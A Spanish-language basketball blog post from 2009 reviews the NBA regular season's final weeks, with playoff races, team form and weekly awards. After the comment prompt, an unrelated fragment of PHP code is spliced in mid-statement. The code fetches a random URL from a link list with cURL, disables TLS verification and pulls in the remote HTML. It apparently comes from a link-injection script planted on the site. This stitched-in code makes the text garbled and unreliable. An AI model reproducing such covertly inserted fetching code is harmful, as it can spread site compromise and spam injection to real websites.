INFORME SEMANAL TJNBA (Semana 22)

30 de March de 2009 por TheDeerHunter

Afrontamos los últimos estertores de la regular season. Apenas restan un par de semanas antes de las vacaciones para casi la mitad de las franquicias y la gran mayoría ya ha dicho todo lo que tenía que decir.

Encontramos varios frentes cerrados o virtualmente decididos. El campeón del Oeste, Lakers, así como los representantes de la conferencia para la postemporada; los equipos que alcanzarán 60 victorias este año; el cuadro alto del Este; los primeros de la regular, Cleveland; así como varios premios…

Por todo esto muchos equipos van dejando paulatinamente de competir. Unos para reservar fuerzas de cara al momento de la verdad que se avecina, otros para ganar papeletas de cara a la lotería, otros porque directamente han perdido cualquier motivación posible o experimentan con gaseosa… En ese sentido este es uno de los momentos más feos de cualquier temporada.

Por suerte quedan todavía atractivos focos de interés e incluso en algunos casos partidos críticos donde alguno se juega la vida… La clasificación del 2º al 7º en el Oeste así como toda la configuración de la primera ronda el Este. Veamos lo que hay y lo que se nos avecina:

ON FIRE

Cleveland da miedito. Vaya temporada de la supuesta banda del Elegido: +60 victorias con un rendimiento casi sobrenatural en casa, récord de todos los tiempos de la franquicia. El equipo se ha configurado como un blindaje total alrededor de un jugador casi perfecto. Le queda un final de liga relativamente incómodo pero apenas nos cabe alguna duda de que quedarán primeros y se llevarán, como mínimo, un par de premios. Veremos si son capaces de certificar su éxito.

Orlando y Dwight Howard también están en condiciones de alcanzar las 60. Su calendario es cómodo con 6 de los 10 partidos que les quedan contra rivales que no se juegan nada. De esta manera prácticamente tienen asegurada la ventaja de campo para la segunda ronda, lo malo es que todo lo que no sea pasar de ella será una decepción. Con el rival que se prevé es imposible despejar las dudas hasta que llegue el momento.

A estos dos equipos debemos añadir a Toronto que, aunque ya está fuera de todo ha realizado una semana perfecta. Por fin se ha encontrado una configuración de equipo con sentido pero el problema es que ya no sirve absolutamente para nada, ni para ahora ni para mañana.

AL TRAN-TRAN

Los finalistas del año pasado velan armas. Los Lakers han llegado hasta donde han podido y habrá que ver si el esfuerzo extra traerá consecuencias. De momento la segunda unidad se ha convertido en un solar que roza lo ridículo. Trabajo tienen para recuperarla. Todo lo contrario podemos decir de Boston. La apuesta ha sido la renuncia a varias victorias y el premio recuperar su segunda unidad. Al final los resultados darán y quitarán razones… Lo paradójico es que de no resultar campeones ambos habrán estado equivocados.

Dos equipos han logrado clarificar su futuro, para bien o para mal y en ambos casos ha sido más por deméritos ajenos que por logros propios. Atlanta quedará 4º en el Este con el cruce contra Cavaliers de reojo. Dallas tiene asegurada la 8ª del oeste. ¿Será el momento de aplicar su We believe particular?

Del 2º al 7º del Oeste los equipos se marcan entre ellos. Spurs, Nuggets, Rockets, Blazers, Jazz y Hornets se encuentran virtualmente empatados a todo. La clave ahora mismo es quedar lo más alto posible gastando lo mínimo, y esas dos variables equilibran de forma muy sensible la ecuación. Cualquiera de ellos renunciará a ventaja/s campo con tal de llegar bien físicamente y mentalmente a los Playoffs. Se acerca el vía crucis para todos, aunque será después de semana santa. Se admiten apuestas.

EL BORDE DEL ABISMO

Cinco franquicias jugando con caramelos envenenados. Uno para cada una. Uno de ellos directamente te mata; tres son tan tóxicos que te martirizarán durante dos semanas antes de también matarte si no se obra un milagro y el último que queda, es terriblemente indigesto pero se puede sobrevivir con un estómago fuerte. Hablamos de los Heat, Sixers, Pistons, Bulls y Bobcats…y la mitad de ellos, no olvidemos, por debajo del 50% en V/D.

Sus respectivos calendarios para la próxima semana:

5.- Heat (39v): Orlando, @Dallas, @Charlotte, @Washington – previsión 2/2

6.- Sixers (37v): Atlanta, Milwaukee, Detroit, @New Jersey – previsión 3/1

7.- Detroit(36v): @Cleveland, @New Jersey, @Philadelphia, Charlotte – previsión 2/2 teniendo en cuenta que recupera efectivos (aunque uno de ellos es AI).

8.- Chicago(36v): @Indiana, New Jersey, New York, Philadelphia – previsión 3/1

9.- Charlotte(33v): Lakers, @Boston, Miami, @Detroit – prevision 1/3

EL POZO

Se ha consumado el drama. Los Suns, por primera vez en muchos años, se irán de vacaciones el 15 de Abril tras las debacles de Utah y Sacramento. El querer y no poder de un equipo que ha dejado de ser grande, de ganar por peso específico aquellos partidos que ganaba antaño y que ahora le ganan. Lo lamentable es haber juntado al mejor Shaq de los últimos años con el peor Nash y no llegar a saber si hubieran podido llegar alguna vez a ser compatibles. Se van a casa por encima del .50, por supuesto.

Al club de habituales ingresan esta semana los Pacers, Nets, Bucks y Knicks, que andaban ya muy cogidos por alfileres. No podemos decir que hayan hecho mala temporada en ninguno de los casos pero los resultados mandan.

Mención a parte los Timberwolves, echando pestes de ellos toda la semana por sus exóticas alineaciones y ayer ganaron con Kevin Ollie destacado. ¿Disimulando o hay algún sentido real en su estrategia de las últimas semanas? Es difícil saberlo.

PREMIOS SEMANALES

MVP: En los últimos 5 partidos 28,6ppp 9,8reb 8,4asis y 2rob. En marzo ha promediado 28,7ppp 8,9reb 8,5 asis 1,7rob y 1,3tap. Esto sólo puede haberlo realizado un jugador. ¿Adivinan?

Rookie: Se han llegado a decir muchas cosas, siempre desde puntos de vista razonables… pero el único importante que sigue a estas alturas haciéndolo bien en situaciones críticas para su equipo es Derrick Rose. Un marzo de 16,4ppp 5,9asis y 4,6reb dirigiendo con jerarquía a un grupo competitivo.

La sorpresa: Ya es bastante sorpresa ver ganar a los Raptors 4 partidos seguidos, más aún con un Andrea Bargnani haciéndolo bien en la posición de pívot titular, aunque no tanto como para justificar aquel pick nº1.

La decepción: Dos leyendas vivas: Shaq&Nash. Deberían coger a Phoenix y repescarlos en su correspondiente lugar dentro del cuadro del Este, a ver qué hacían…

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>